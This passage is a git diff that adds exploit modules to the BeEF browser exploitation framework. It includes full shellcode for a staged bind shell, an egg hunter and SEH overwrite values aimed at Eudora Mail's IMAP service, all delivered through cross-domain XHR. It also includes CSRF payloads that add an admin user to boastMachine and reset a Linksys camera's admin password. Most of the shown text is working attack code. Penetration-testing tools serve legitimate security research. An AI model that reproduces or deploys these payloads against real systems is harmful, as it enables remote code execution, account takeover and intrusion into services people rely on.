bytes = Math.ceil((3 * input.length) / 4.0); + /** + if (lkey1 == 64) bytes--; //padding chars, so skip + if (lkey2 == 64) bytes--; //padding chars, so skip + **/ + + var uarray = []; + var chr1, chr2, chr3; + var enc1, enc2, enc3, enc4; + var i = 0; + var j = 0; + + input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); + + for (i = 0; i < bytes; i += 3) { + //get the 3 octects in 4 ascii chars + enc1 = this._keyStr.indexOf(input.charAt(j++)); + enc2 = this._keyStr.indexOf(input.charAt(j++)); + enc3 = this._keyStr.indexOf(input.charAt(j++)); + enc4 = this._keyStr.indexOf(input.charAt(j++)); + + chr1 = (enc1 << 2) | (enc2 >> 4); + chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); + chr3 = ((enc3 & 3) << 6) | enc4; + + uarray.push(chr1 & 0xff); + if (enc3 != 64) uarray.push(chr2 & 0xff); + if (enc4 != 64) uarray.push(chr3 & 0xff); + } + return uarray; + } + }; + + + /* + * Ty's goodness. Slightly modified BeEF bind stager to work with the + * Egg Hunter. + * + * Original size: 299 bytes + * Final size: 326 bytes + * BadChars removed: \x00\x0a\x0d\x20\x7b + */ + var stager = "B33FB33F" + + "\xba\x6a\x99\xf8\x25\xd9\xcc\xd9\x74\x24\xf4\x5e\x31\xc9" + + "\xb1\x4b\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\x9f\x65" + + "\x10\xac\x5f\x96\xe1\xcf\xd6\x73\xd0\xdd\x8c\xf0\x41\xd2" + + "\xc7\x55\x6a\x99\x85\x4d\xf9\xef\x01\x61\x4a\x45\x77\x4c" + + "\x4b\x6b\xb7\x02\x8f\xed\x4b\x59\xdc\xcd\x72\x92\x11\x0f" + + "\xb3\xcf\xda\x5d\x6c\x9b\x49\x72\x19\xd9\x51\x73\xcd\x55" + + "\xe9\x0b\x68\xa9\x9e\xa1\x73\xfa\x0f\xbd\x3b\xe2\x24\x99" + + "\x9b\x13\xe8\xf9\xe7\x5a\x85\xca\x9c\x5c\x4f\x03\x5d\x6f" + + "\xaf\xc8\x60\x5f\x22\x10\xa5\x58\xdd\x67\xdd\x9a\x60\x70" + + "\x26\xe0\xbe\xf5\xba\x42\x34\xad\x1e\x72\x99\x28\xd5\x78" + + "\x56\x3e\xb1\x9c\x69\x93\xca\x99\xe2\x12\x1c\x28\xb0\x30" + + "\xb8\x70\x62\x58\x99\xdc\xc5\x65\xf9\xb9\xba\xc3\x72\x2b" + + "\xae\x72\xd9\x24\x03\x49\xe1\xb4\x0b\xda\x92\x86\x94\x70" + + "\x3c\xab\x5d\x5f\xbb\xcc\x77\x27\x53\x33\x78\x58\x7a\xf0" + + "\x2c\x08\x14\xd1\x4c\xc3\xe4\xde\x98\x44\xb4\x70\x73\x25" + + "\x64\x31\x23\xcd\x6e\xbe\x1c\xed\x91\x14\x35\xdf\xb6\xc4" + + "\x52\x22\x48\xfa\xfe\xab\xae\x96\xee\xfd\x79\x0f\xcd\xd9" + + "\xb2\xa8\x2e\x08\xef\x61\xb9\x04\xe6\xb6\xc6\x94\x2d\x95" + + "\x6b\x3c\xa5\x6e\x60\xf9\xd4\x70\xad\xa9\x81\xe7\x3b\x38" + + "\xe0\x96\x3c\x11\x41\x58\xd3\x9a\xb5\x33\x93\xc9\xe6\xa9" + + "\x13\x86\x50\x8a\x47\xb3\x9f\x07\xee\xfd\x35\xa8\xa2\x51" + + "\x9e\xc0\x46\x8b\xe8\x4e\xb8\xfe\xbf\x18\x80\x97\xb8\x8b" + + "\xf3\x4d\x47\x15\x6f\x03\x23\x57\x1b\xd8\xed\x4c\x16\x5d" + + "\x37\x96\x26\x84"; + + /* + * Ty's goodness. Original BeEF bind stage. + * + * Original size: 792 bytes + */ + var stage_allow_origin = + "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28" + + "\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52" + + "\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" + + "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38" + + "\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58" + + "\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a" + + "\x8b\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5" + + "\x89\xc6\x68\x01\x00\x00\x00\x68\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68\x00\x00\x00\x00\x89" + + "\xe3\x68\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c\x24\x0c\x57\x53\x51\x68\x3e\xcf" + + "\xaf\x0e\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00\x00" + + "\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68\x00\x00\x00\x00" + + "\x68\x01\x00\x00\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24\x04\x68\x00\x00\x00\x00\x68" + + "\x01\x00\x00\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" + + "\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" + + "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79" + + "\xcc\x3f\x86\xff\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d" + + "\xbe\x18\x04\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20" + + "\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74\x2f" + + "\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c" + + "\x6c\x6f\x77\x2d\x4f\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" + + "\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x31\x36\x0d\x0a\x0d\x0a\x5e\xb9\x62\x00\x00\x00\xf3" + + "\xa4\x5e\x56\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90" + + "\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68" + + "\xea\x0f\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2" + + "\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff" + + "\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00\x5e\x89\x3e\x6a\x00\x68\x00" + + "\x04\x00\x00\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" + + "\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb\xf2\x81\xc3" + + "\x03\x00\x00\x00\x43\x53\x68\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00\x57\x68\x01\x00\x00\x00" + + "\x53\x8b\x5c\x24\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00" + + "\x00\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24\x74\x8b" + + "\x1b\x53\x68\x18\xb7\x3c\xb3\xff\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0\x74\x3d\x68\x00\x00" + + "\x00\x00\x8d\xbe\x14\x04\x00\x00\x57\x68\x86\x0b\x00\x00\x8d\xbe\x7a\x04\x00\x00\x57\x8d\x5c" + + "\x24\x70\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18\x04" + + "\x00\x00\x57\xff\x36\x68\xc2\xeb\x38\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52\xff\xd5\xe9\x38" + + "\xfe\xff\xff"; + + // Skape's NtDisplayString egghunter technique, 32 bytes -> see also string T00W inside + /* + * Egg Hunter (Skape's NtDisplayString technique). + * Original size: 32 bytes + * + * Next SEH and SEH pointers + * Size: 8 bytes + */ + var egg_hunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" + + "\xef\xb8\x42\x33\x33\x46\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"; + var next_seh = "\xeb\x06\x90\x90"; + var seh = "\x4e\x3b\x01\x10"; + + + gen_nops = function(count){ + var i = 0; + var result = ""; + while(i < count ){ result += "\x90";i++;} + log("gen_nops: generated " + result.length + " nops."); + return result; + }; + + /* + * send_stager_back(): + * In order to properly calculate the exact size of the cross-domain request headers, + * we send a bogus request back to BeEF (different port, so still cross-domain). + * + * get_junk_size(): + * Then we retrieve the total size of the HTTP headers, as well as other specific headers like 'Host' + * + * calc_junk_size(): + * Calculate the differences with the request that will be sent to the target, for example: + * "Host: 172.16.67.1:2000\r\n" //24 bytes + * "Host: 172.16.67.135:143\r\n" //25 bytes + */ + send_stager_back = function(){ + var uri = "http://" + beef_host + ":" + beef_junk_port + "/"; + var xhr = new XMLHttpRequest(); + xhr.open("POST", uri, true); + xhr.setRequestHeader("Content-Type", "text/plain"); + xhr.setRequestHeader('Accept','*/*'); + xhr.setRequestHeader("Accept-Language", "en"); + xhr.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); + log("send_stager_back: sending back the stager to calculate headers size"); + }; + + var timeout_counter = 0; + var timeout = 10; + var size,host,contenttype,referer,nops = null; + get_junk_size = function(){ + var junk_name = ""; + var uri = "http://" + beef_host + ":" + beef_port + "/api/ipec/junk/" + sock_name; + + $j.ajax({ + type: "GET", + url: uri, + dataType: "json", + success: function(data, textStatus, xhr){ + size = data.size; + host = data.host; + contenttype = data.contenttype; + referer = data.referer; + + //todo to it better + nops = data.nops; + + log("get_junk_size: OK - size [" + size + "] - host [" + + host + "] - contenttype [" + contenttype + "] - referer [" + referer + "]"); + }, + error: function(jqXHR, textStatus, errorThrown){ + timeout_counter++; + // re-tries for 10 times (10 seconds) + if (timeout_counter < timeout) { + log("get_junk_size: ERROR - no data yet. re-trying."); + setTimeout(function() {get_junk_size()},1000); + }else{ + log("get_junk_size: ERROR - timeout reached. giving up."); + } + } + }); + + }; + + var final_junk_size = null; + calc_junk_size = function(){ + + final_junk_size = size; + // 8 -> Host: \r\n + var new_host = (rhost+":"+service_port).length + 8; + if(new_host != host){ + + if(new_host > host){ + var diff = new_host - host; + final_junk_size += diff; + }else{ + var diff = host - new_host; + final_junk_size -= diff; + } + } + log("get_junk_size: final_junk_size -> [" + final_junk_size + "]"); + + //content-type "; charset=UTF-8" will not be present at the end, in the new request - we save 15 bytes + if(contenttype > 26) + final_junk_size -= 15; + + // referrer should be the same + // we can also override the UserAgent (deliovering the Firefox Extension). We can then save 90 bytes or more. + log("get_junk_size: final_junk_size -> [" + final_junk_size + "]"); + }; + + var stager_successfull = false; + send_stager = function(){ + + try{ + xhr = new XMLHttpRequest(); + var uri = "http://" + rhost + ":" + service_port + path; + log("send_stager: URI " + uri); + xhr.open("POST", uri, true); + xhr.setRequestHeader("Content-Type", "text/plain"); + + //todo: if for some reasons the headers are too big (bigger than 425 bytes), + // a warning should be displayed, because the exploit will not work, given the + // space for the shellcode that we have. + // The likelihood of this can be minimized thanks to the Firefox Extension we deliver + // to disable PortBanning. We are also overriding the UserAgent, so we save up to 100 bytes of space. + + var junk = available_space - stager.length - final_junk_size; // 22 bytes + var junk_data = gen_nops(junk); + + var payload = junk_data + stager + next_seh + seh + egg_hunter; + var decoded_payload = Base64Binary.decode(btoa(payload)); + + var c = ""; + for (var i = 0; i < decoded_payload.length; i++) { + c += String.fromCharCode(decoded_payload[i] & 0xff); + } + + //needed to have the service replying before sending the actual exploit + xhr.open("POST", uri, true); + xhr.setRequestHeader("Content-Type", "text/plain"); + xhr.setRequestHeader('Accept','*/*'); + xhr.setRequestHeader("Accept-Language", "en"); + xhr.send("a001 LIST \r\n"); + // / needed to have the service replying before sending the actual exploit + + xhr.open("POST", uri, true); + xhr.setRequestHeader("Content-Type", "text/plain"); + xhr.setRequestHeader('Accept','*/*'); + xhr.setRequestHeader("Accept-Language", "en"); + + var post_body = "a001 LIST " + "}" + c + "}" + "\r\n"; + + log("send_stager: Final body length [" + post_body.length + "]"); + + // this is required only with WebKit browsers. + if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { + console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary."); + XMLHttpRequest.prototype.sendAsBinary = function(datastr) { + function byteValue(x) { + return x.charCodeAt(0) & 0xff; + } + var ords = Array.prototype.map.call(datastr, byteValue); + var ui8a = new Uint8Array(ords); + this.send(ui8a.buffer); + } + } + + xhr.sendAsBinary(post_body); + log("send_stager: stager sent."); + stager_successfull = true; + }catch(exception){ + console.log("!!! Exception: " + exception); + // Check for PortBanning exceptions: + //NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited + if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){ + // not exactly needed but just in case + stager_successfull = false; + log("Error: NS_ERROR_PORT_ACCESS_NOT_ALLOWED. Looks like PortBanning for port [" + service_port + "] is still enabled!"); + } + } + + }; + + deploy_stage = function () { + if(stager_successfull){ + // As soon as the stage is running, the HTTP responses will contain Access-Control-Allow-Origin: * + // so we can communicate with CORS normally. + var decoded_shellcode = Base64Binary.decode(btoa(stage_allow_origin)); + var c = ""; + for (var i = 0; i < decoded_shellcode.length; i++) { + c += String.fromCharCode(decoded_shellcode[i] & 0xff); + } + var post_body = "cmd=" + c; + var uri = "http://" + rhost + ":" + rport + path; + + xhr = new XMLHttpRequest(); + console.log("uri: " + uri); + xhr.open("POST", uri, true); + xhr.setRequestHeader("Content-Type", "text/plain"); + + // this is required only with WebKit browsers. + if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { + console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary."); + XMLHttpRequest.prototype.sendAsBinary = function(datastr) { + function byteValue(x) { + return x.charCodeAt(0) & 0xff; + } + var ords = Array.prototype.map.call(datastr, byteValue); + var ui8a = new Uint8Array(ords); + this.send(ui8a.buffer); + } + } + + xhr.sendAsBinary(post_body); + log("deploy_stage: stage sent.\r\n You should be now able to use beef_bind_shell module to send commands."); + }else{ + log("Skipping Stage delivery because Stager failed."); + } + + }; + + log = function(data){ + beef.net.send("<%= @command_url %>", <%= @command_id %>, data); + console.log(data); + }; + + +/* +* To calculate exact HTTP header size we send a request back to BeEF, on a different socket, to maintain +* the cross-domain behavior. +*/ +send_stager_back(); + +/* +* Deliver Stager and Stage. +* +* The following timeouts should be enough with normal DSL lines. +* Increase delay value for slower clients. +*/ +setTimeout("get_junk_size()", delay/2); +setTimeout("calc_junk_size()", delay); +setTimeout("send_stager()", 2000 + delay); +setTimeout("deploy_stage()", 6000 + delay); + +}); + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml b/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml new file mode 100755 index 000000000..d824aefc0 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + BeEF_bind_staged_deploy: + enable: true + category: ["Exploits", "BeEF_bind"] + name: "BeEF bind" + description: "Pwn internal services with a custom staging shellcode. Both the stager and the stage are delivered.
Right now only Eudora Mail 3 (v. v6.1.19.0) on Windows (POP ECX mailcmn.dll) can be exploited: SEH exploit with EggHunter.
More exploits to come soon." + authors: ["antisnatchor", "tymiller"] # shellcode awesomeness -> Ty Miller + target: + working: ["FF"] diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb new file mode 100755 index 000000000..62a042541 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb @@ -0,0 +1,30 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Beef_bind_staged_deploy < BeEF::Core::Command + + def self.options + configuration = BeEF::Core::Configuration.instance + beef_host = "#{configuration.get("beef.http.host")}" + beef_port = "#{configuration.get("beef.http.port")}" + + return [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'}, + { 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '143'}, + { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'}, + { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'}, + { 'name' => 'delay', 'ui_label' => 'Add delay (ms)', 'value' => '4000'}, + { 'name' => 'beef_host', 'ui_label' => 'BeEF Host', 'value' => beef_host}, + { 'name' => 'beef_port', 'ui_label' => 'BeEF Port', 'value' => beef_port}, + { 'name' => 'beef_junk_port', 'ui_label' => 'BeEF Junk Port', 'value' => '2000'}, + { 'name' => 'beef_junk_socket', 'ui_label' => 'BeEF Junk Socket Name', 'value' => 'imapeudora1'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/command.js b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js new file mode 100644 index 000000000..a456ebdc6 --- /dev/null +++ b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js @@ -0,0 +1,32 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var base = '<%= @base %>'; + var username = '<%= @username %>'; + var password = '<%= @password %>'; + var email = '<%= @email %>'; + + var boastmachine_iframe = beef.dom.createIframeXsrfForm(base, "POST", [ + {'type':'hidden', 'name':'action', 'value':'add_user'}, + {'type':'hidden', 'name':'do', 'value':'add'}, + {'type':'hidden', 'name':'user_login', 'value':username}, + {'type':'hidden', 'name':'user_pass', 'value':password}, + {'type':'hidden', 'name':'user_name', 'value':username}, + {'type':'hidden', 'name':'user_email', 'value':email}, + {'type':'hidden', 'name':'blogs[]', 'value':'4'}, + {'type':'hidden', 'name':'user_level', 'value':'4'}, + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(boastmachine_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml new file mode 100644 index 000000000..e081ee76e --- /dev/null +++ b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + boastmachine_add_user_csrf: + enable: true + category: "Exploits" + name: "boastMachine <= 3.1 Add User CSRF" + description: "Attempts to add a user to a boastMachine <= 3.1 install." + authors: ["bcoles", "Dr.NaNo"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb new file mode 100644 index 000000000..d3960b92b --- /dev/null +++ b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb @@ -0,0 +1,21 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Boastmachine_add_user_csrf < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'base', 'ui_label' => 'boastMachine URL', 'value' => 'http://target/bmc/admin.php?action=add_user&blog'}, + { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'}, + { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'}, + { 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/command.js b/modules/exploits/camera/dlink_dcs_series_csrf/command.js index 725d60c24..71fd886fd 100644 --- a/modules/exploits/camera/dlink_dcs_series_csrf/command.js +++ b/modules/exploits/camera/dlink_dcs_series_csrf/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var base = '<%= @base %>'; var passwd = '<%= @password %>'; diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml index af3d4a3f0..515f1faac 100644 --- a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml +++ b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # More info: http://www.exploit-db.com/exploits/18509/ # diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/module.rb b/modules/exploits/camera/dlink_dcs_series_csrf/module.rb index 49ed6809f..a96724404 100644 --- a/modules/exploits/camera/dlink_dcs_series_csrf/module.rb +++ b/modules/exploits/camera/dlink_dcs_series_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Dlink_dcs_series_csrf < BeEF::Core::Command diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js new file mode 100644 index 000000000..6ab1c5d73 --- /dev/null +++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js @@ -0,0 +1,35 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var gateway = '<%= @base %>'; + var path = 'adm/file.cgi'; + var passwd = '<%= @password %>'; + + var linksys_wvc_iframe = beef.dom.createIframeXsrfForm(gateway + path, "POST", + [{'type':'hidden', 'name':'adm', 'value':'admin'}, + {'type':'hidden', 'name':'admpw', 'value':passwd}, + {'type':'hidden', 'name':'admpwv', 'value':passwd}, + {'type':'hidden', 'name':'language', 'value':'1'}, + {'type':'hidden', 'name':'h_usernamelist', 'value':''}, + {'type':'hidden', 'name':'h_language', 'value':'1'}, + {'type':'hidden', 'name':'h_lang_from_mac','value':''}, + {'type':'hidden', 'name':'this_file', 'value':'pass_wd.htm'}, + {'type':'hidden', 'name':'next_file', 'value':'pass_wd.htm'}, + {'type':'hidden', 'name':'todo', 'value':'save'}, + {'type':'hidden', 'name':'video_file', 'value':''}, + {'type':'hidden', 'name':'', 'value':'Submit form'} + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(linksys_wvc_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml new file mode 100644 index 000000000..7ff69cab3 --- /dev/null +++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + linksys_wvc_wireless_camera_csrf: + enable: true + category: ["Exploits", "Camera"] + name: "Linksys WVC series CSRF" + description: "Attempts to change the admin password on a Linksys WVCseries wireless camera." + authors: ["bcoles", "n0x00"] + target: + working: ["ALL"] diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb new file mode 100644 index 000000000..6dc483e7b --- /dev/null +++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Linksys_wvc_wireless_camera_csrf < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.101/'}, + {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/command.js b/modules/exploits/coldfusion_dir_traversal_exploit/command.js index ec06b38d9..98992ae43 100644 --- a/modules/exploits/coldfusion_dir_traversal_exploit/command.js +++ b/modules/exploits/coldfusion_dir_traversal_exploit/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /** * ColdFusion Directory Traversal Exploit (CVE-2010-2861) by antisnatchor . * Inject into the vulnerable "locale" parameter the classic payload of a directory traversal. diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml b/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml index e65daa2c1..09cae23bc 100644 --- a/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml +++ b/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# 